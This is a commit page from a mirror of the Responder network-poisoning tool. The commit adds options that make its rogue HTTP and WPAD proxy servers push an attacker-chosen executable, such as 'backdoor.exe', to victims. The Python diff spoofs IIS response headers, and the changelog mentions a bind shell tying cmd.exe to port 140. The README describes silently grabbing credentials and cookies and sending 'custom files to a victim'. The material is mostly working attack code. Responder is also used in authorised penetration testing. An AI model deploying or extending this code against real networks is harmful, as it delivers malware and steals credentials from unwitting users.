github/Responder
1
0
Fork 0
mirror of https://github.com/lgandx/Responder.git synced 2025-07-07 05:21:22 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Added: Ability to serve whatever kind of file via HTTP and WPAD There's now 3 new options.

Browse source
This commit is contained in:
Lgandx 2013-10-25 00:04:11 -04:00
parent 9bfd8ade90
commit a8c29522db
4 changed files with 118 additions and 7 deletions
Download patch file Download diff file Expand all files Collapse all files

4
CHANGELOG.txt
View file

@ -1,4 +1,8 @@
ChangeLog from 0.6 to 1.9: ChangeLog from 0.6 to 1.9:
- Added: Bind shell which when executed on a victim workstation, will bind cmd.exe to port 140.
- Added: -e, --exe, --file option for serving specific files via the HTTP and WPAD server.
- Added: Ability to bind Responder to a specific interface
- Fix: Several fixes
- Added: HTTPS module. - Added: HTTPS module.
- Added: Support for LM Hash downgrade. - Added: Support for LM Hash downgrade.
- Added: WPAD transparent proxy server. - Added: WPAD transparent proxy server.

43
HTTPProxy.py
View file

@ -49,6 +49,49 @@ class WPADScript(Packet):
def calculate(self): def calculate(self):
self.fields["ActualLen"] = len(str(self.fields["Payload"])) self.fields["ActualLen"] = len(str(self.fields["Payload"]))
class ServerExeFile(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 200 OK\r\n"),
("ContentType", "Content-Type: application/octet-stream\r\n"),
("LastModified", "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"),
("AcceptRanges", "Accept-Ranges: bytes\r\n"),
("Server", "Server: Microsoft-IIS/7.5\r\n"),
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
("ContentLen", "Content-Length: "),
("ActualLen", "76"),
("Date", "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
("Connection", "Connection: keep-alive\r\n"),
("X-CCC", "US\r\n"),
("X-CID", "2\r\n"),
("CRLF", "\r\n"),
("Payload", "jj"),
])
def calculate(self):
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
class ServeAlwaysExeFile(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 200 OK\r\n"),
("ContentType", "Content-Type: application/octet-stream\r\n"),
("LastModified", "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"),
("AcceptRanges", "Accept-Ranges: bytes\r\n"),
("Server", "Server: Microsoft-IIS/7.5\r\n"),
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
("ContentDisp", "Content-Disposition: attachment; filename="),
("ContentDiFile", ""),
("FileCRLF", ";\r\n"),
("ContentLen", "Content-Length: "),
("ActualLen", "76"),
("Date", "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
("Connection", "Connection: keep-alive\r\n"),
("X-CCC", "US\r\n"),
("X-CID", "2\r\n"),
("CRLF", "\r\n"),
("Payload", "jj"),
])
def calculate(self):
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
#HTTP Packet used for further NTLM auth. #HTTP Packet used for further NTLM auth.
class IIS_Auth_407_Ans(Packet): class IIS_Auth_407_Ans(Packet):
fields = OrderedDict([ fields = OrderedDict([

17
README.txt
View file

@ -41,7 +41,7 @@ FEATURES
supports NTLMv1, NTLMv2 hashes *and* Basic Authentication. This server supports NTLMv1, NTLMv2 hashes *and* Basic Authentication. This server
was successfully tested on IE 6 to IE 10, Firefox, Chrome, Safari. was successfully tested on IE 6 to IE 10, Firefox, Chrome, Safari.
Note: This module also works for WebDav NTLM authentication issued from Note: This module also works for WebDav NTLM authentication issued from
Windows WebDav clients (WebClient). Windows WebDav clients (WebClient). You can now send your custom files to a victim.
- Built-in HTTPS Auth server. - Built-in HTTPS Auth server.
In order to redirect HTTPS Authentication to this tool, you will need In order to redirect HTTPS Authentication to this tool, you will need
@ -86,7 +86,7 @@ FEATURES
- WPAD rogue transparent proxy server. This module will *silently* grab the encrypted - WPAD rogue transparent proxy server. This module will *silently* grab the encrypted
credentials of anyone launching Internet Explorer on the network. It will also grab credentials of anyone launching Internet Explorer on the network. It will also grab
the cookie of the requested page. This module is higly effective. the cookie of the requested page. This module is higly effective. You can now send your custom files to a victim.
CONSIDERATIONS CONSIDERATIONS
============== ==============
@ -166,6 +166,19 @@ Options List:
--lm=0 Set this to 1 if you want to force LM hashing --lm=0 Set this to 1 if you want to force LM hashing
downgrade for Windows XP/2003 and earlier. Default value is False (0) downgrade for Windows XP/2003 and earlier. Default value is False (0)
-e 0 Set this option to 1 if you'd like to serve a specific
file via http & WPAD proxy server when one of these
extensions are present in the url. Default value is
False (0)
--exe=0 Set this option to 1 if you'd like to always serve a
specific file via http & WPAD proxy server. It's best
to use this option with the --file option. Default
value is False (0)
--file=backdoor.exe Serve a specific file when using -e option. Default is
FixInternet.exe (provided with Responder)
For more information read these posts: For more information read these posts:
http://blog.spiderlabs.com/2012/10/introducing-responder-10.html http://blog.spiderlabs.com/2012/10/introducing-responder-10.html

59
Responder.py
View file

@ -57,6 +57,12 @@ parser.add_option('-w','--wpad', action="store", dest="WPAD_On_Off", help = "Set
parser.add_option('--lm',action="store", help="Set this to 1 if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False (0)", metavar="0",dest="LM_On_Off", choices=['0','1'], default="0") parser.add_option('--lm',action="store", help="Set this to 1 if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False (0)", metavar="0",dest="LM_On_Off", choices=['0','1'], default="0")
parser.add_option('-e',action="store", help="Set this option to 1 if you'd like to serve a specific file via http & WPAD proxy server when one of these extensions are present in the url. Default value is False (0)", metavar="0",dest="Exe_On_Off", choices=['0','1'], default="0")
parser.add_option('--exe',action="store", help="Set this option to 1 if you'd like to always serve a specific file via http & WPAD proxy server. It's best to use this option with the --file option. Default value is False (0)", metavar="0",dest="Exec_Mode_On_Off", choices=['0','1'], default="0")
parser.add_option('--file',action="store", help="Serve a specific file when using -e option. Default is FixInternet.exe (provided with Responder)", metavar="backdoor.exe",dest="FILENAME", default="FixInternet.exe")
options, args = parser.parse_args() options, args = parser.parse_args()
if options.OURIP is None: if options.OURIP is None:
@ -79,6 +85,9 @@ OURIP = options.OURIP
BOUND_TO_IP = options.BOUND_TO_IP BOUND_TO_IP = options.BOUND_TO_IP
Basic = options.Basic Basic = options.Basic
On_Off = options.on_off.upper() On_Off = options.on_off.upper()
Exe_On_Off = options.Exe_On_Off
Exec_Mode_On_Off =options.Exec_Mode_On_Off
FILENAME = options.FILENAME
SSL_On_Off = options.SSL_On_Off.upper() SSL_On_Off = options.SSL_On_Off.upper()
SMB_On_Off = options.SMB_on_off.upper() SMB_On_Off = options.SMB_on_off.upper()
SQL_On_Off = options.SQL_on_off.upper() SQL_On_Off = options.SQL_on_off.upper()
@ -122,7 +131,7 @@ Challenge = ""
for i in range(0,len(NumChal),2): for i in range(0,len(NumChal),2):
Challenge += NumChal[i:i+2].decode("hex") Challenge += NumChal[i:i+2].decode("hex")
Show_Help("[+]NBT-NS & LLMNR responder started\nGlobal Parameters set:\nChallenge set is: %s\nWPAD Proxy Server is:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\n"%(NumChal,WPAD_On_Off,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off)) Show_Help("[+]NBT-NS & LLMNR responder started\nGlobal Parameters set:\nChallenge set is: %s\nWPAD Proxy Server is:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\nServing Executable via HTTP&WPAD is:%s\nAlways serving executable via HTTP&WPAD is:%s\n\n"%(NumChal,WPAD_On_Off,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off,Exe_On_Off,Exec_Mode_On_Off))
#Simple NBNS Services. #Simple NBNS Services.
W_REDIRECT = "\x41\x41\x00" W_REDIRECT = "\x41\x41\x00"
@ -913,11 +922,44 @@ def Basic_Ntlm(Basic):
if Basic == "0": if Basic == "0":
return IIS_Auth_401_Ans() return IIS_Auth_401_Ans()
def ServeEXE(data,client, Filename):
Message = "[+]Exe file sent to: %s . Try telnet %s on port 140"%(client,client)
print Message
logging.warning(Message)
with open (Filename, "rb") as bk:
data = bk.read()
bk.close()
return data
def ServeEXEOrNot(on_off):
if Exe_On_Off == "1":
return True
if Exe_On_Off == "0":
return False
def ServeEXECAlwaysOrNot(on_off):
if Exec_Mode_On_Off == "1":
return True
if Exec_Mode_On_Off == "0":
return False
Exec_Mode_On_Off
#Handle HTTP packet sequence. #Handle HTTP packet sequence.
def PacketSequence(data,client): def PacketSequence(data,client):
a = re.findall('(?<=Authorization: NTLM )[^\\r]*', data) a = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
b = re.findall('(?<=Authorization: Basic )[^\\r]*', data) b = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
c = re.findall('(?<=wpad.dat )[^\\r]*', data) c = re.findall('(?<=wpad.dat )[^\\r]*', data)
if ServeEXEOrNot(Exe_On_Off) and re.findall('.exe', data):
payload = ServeEXE(data,client,FILENAME)
buffer1 = ServerExeFile(Payload = payload,filename=FILENAME)
buffer1.calculate()
return str(buffer1)
if ServeEXECAlwaysOrNot(Exec_Mode_On_Off):
payload = ServeEXE(data,client,FILENAME)
buffer1 = ServeAlwaysExeFile(Payload = payload,ContentDiFile=FILENAME)
buffer1.calculate()
return str(buffer1)
if a: if a:
packetNtlm = b64decode(''.join(a))[8:9] packetNtlm = b64decode(''.join(a))[8:9]
if packetNtlm == "\x01": if packetNtlm == "\x01":
@ -943,7 +985,6 @@ def PacketSequence(data,client):
buffer1 = IIS_Auth_Granted() buffer1 = IIS_Auth_Granted()
buffer1.calculate() buffer1.calculate()
return str(buffer1) return str(buffer1)
if c: if c:
GrabCookie(data,client) GrabCookie(data,client)
buffer1 = IIS_Auth_Redir() buffer1 = IIS_Auth_Redir()
@ -970,7 +1011,7 @@ class HTTP(SocketServer.BaseRequestHandler):
self.request.send(buff) self.request.send(buff)
else: else:
buffer0 = PacketSequence(data,self.client_address[0]) buffer0 = PacketSequence(data,self.client_address[0])
self.request.send(buffer0) self.request.sendall(buffer0)
except Exception: except Exception:
pass#No need to be verbose.. pass#No need to be verbose..
self.request.close() self.request.close()
@ -1035,6 +1076,16 @@ def ParseDomain(data,client):
def ProxyPacketSequence(data,client): def ProxyPacketSequence(data,client):
a = re.findall('(?<=Proxy-Authorization: NTLM )[^\\r]*', data) a = re.findall('(?<=Proxy-Authorization: NTLM )[^\\r]*', data)
b = re.findall('(?<=Authorization: Basic )[^\\r]*', data) b = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
if ServeEXEOrNot(Exe_On_Off) and re.findall('.exe', data):
payload = ServeEXE(data,client,FILENAME)
buffer1 = ServerExeFile(Payload = payload, filename=FILENAME)
buffer1.calculate()
return str(buffer1)
if ServeEXECAlwaysOrNot(Exec_Mode_On_Off):
payload = ServeEXE(data,client,FILENAME)
buffer1 = ServeAlwaysExeFile(Payload = payload,ContentDiFile=FILENAME)
buffer1.calculate()
return str(buffer1)
if a: if a:
packetNtlm = b64decode(''.join(a))[8:9] packetNtlm = b64decode(''.join(a))[8:9]
if packetNtlm == "\x01": if packetNtlm == "\x01":
@ -1075,7 +1126,7 @@ class HTTPProxy(SocketServer.BaseRequestHandler):
data = self.request.recv(8092) data = self.request.recv(8092)
ParseDomain(data,self.client_address[0]) ParseDomain(data,self.client_address[0])
buffer0 = ProxyPacketSequence(data,self.client_address[0]) buffer0 = ProxyPacketSequence(data,self.client_address[0])
self.request.send(buffer0) self.request.sendall(buffer0)
except Exception: except Exception:
pass#No need to be verbose.. pass#No need to be verbose..